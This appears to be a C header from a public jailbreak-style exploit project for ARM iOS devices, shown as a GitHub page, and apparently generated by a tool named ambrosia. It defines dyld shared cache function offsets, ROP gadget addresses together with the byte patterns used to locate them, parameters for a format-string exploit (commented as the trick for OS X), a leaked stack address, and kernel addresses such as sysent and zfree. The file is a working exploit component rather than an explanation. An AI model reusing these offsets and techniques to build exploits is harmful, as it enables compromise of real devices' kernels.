-
Notifications
You must be signed in to change notification settings - Fork 3
/
constants_template.h
87 lines (65 loc) · 2.35 KB
/
constants_template.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
/*
there are probably offsets that need to be manually updated, this file ONLY can guarantee to have the proper offsets for the following: (minus _syslog, not sure
about that one)
#ifdef DEBUG
#define _syslog 0x69fc8
#endif
#define _dsc_mmap 0x307c5658 + 1
#define _dsc_open 0x307d4dc4
#define _dsc_mkdir 0x307c7c34
#define _dsc_ioctl 0x307c6bf8 + 1
#define _dsc_close 0x307c571c
#define _dsc_exit 0x320a49d0 + 1
#define _dsc_mount 0x307d66e4
#define _dsc_unmount 0x307d7040
#define _dsc_fopen 0x320a2004 + 1
#define _dsc_fclose 0x320a265c + 1
#define _dsc_fread 0x320a8814 + 1
#define _dsc_syscall 0x307d5afc
#define IOLOG (0x80203edc + 1)
working on getting
#define LIBC_POP_R0123 0x32109b10
#define LIBC_BLX_R4_POP_R47 (0x320bcf38 + 1)
LIBC_POP_R0123 find 0f80bde8 in libsystem_c.dylib = 0x077b10
machoman libsystem_c.dylib -a 0x077b10
LIBC_BLX_R4_POP_R47 find a0 47 04 46 20 46 90 bd in libsystem_c.dylib = 0x02A2F38
machoman libsystem_c.dylib -a 0x02A2F38
this file is generated by ambrosia
*/
//#define DEBUG
#define STRLEN_PID 2
#define LOG_SHIFT (35 + STRLEN_PID)
// (*p1)==p2, this is the trick to exploit format strings on OSX
// p3 is an unused param that'll be used as a pointer to any address
#define P1 619
#define P2 625
#define P3 678
// p2 address: 0x2fdffe[44]
#define P3_ADDR_LO 0x44 + (P3 - P2) * 4;
// saved LR inside _vasprintf_l, after the call to j__malloc_zone_malloc
// address of #605 :
// <p2 address> - (p2 - 605) * 4
// 0x2fdffe44 - (625 - 605) * 4 = 0x2fdffdf4
#define LEAKED_LIBC_SAVED_LR_ADDR 0x2fdffdf4
#define LEAKED_LIBC_SAVED_LR_SHOULD_BE (0x320991b3 + 1) //FIXME:
#define ROP_ABS_ADDR 0x2fdffe30
#define _dsc_mmap (AMB_MMAP + 1)
#define _dsc_open AMB_OPEN
#define _dsc_mkdir AMB_MKDIR
#define _dsc_ioctl (AMB_IOCTL + 1)
#define _dsc_close AMB_CLOSE
#define _dsc_mount AMB_MOUNT
#define _dsc_unmount AMB_UNMOUNT
#define _dsc_syscall AMB_SYSCALL
#define _dsc_execve AMB_EXECVE
#define _dsc_fopen (AMB_FOPEN + 1)
#define _dsc_fclose (AMB_FCLOSE + 1)
#define _dsc_fread (AMB_FREAD + 1)
#define _dsc_exit (AMB_EXIT + 1)
#define LIBC_POP_R0123 AMB_R0123
#define LIBC_BLX_R4_POP_R47 (AMB_POPR47 + 1)
#define ZFREE (0x8002f3d0 + 1)
#define SYSENT 0x802ccbac
#define IOLOG (AMB_IOLOG + 1)
#define FLUSH_DCACHE_ALL 0x80071b0c
#define INVALIDATE_ICACHE_ALL 0x800719c4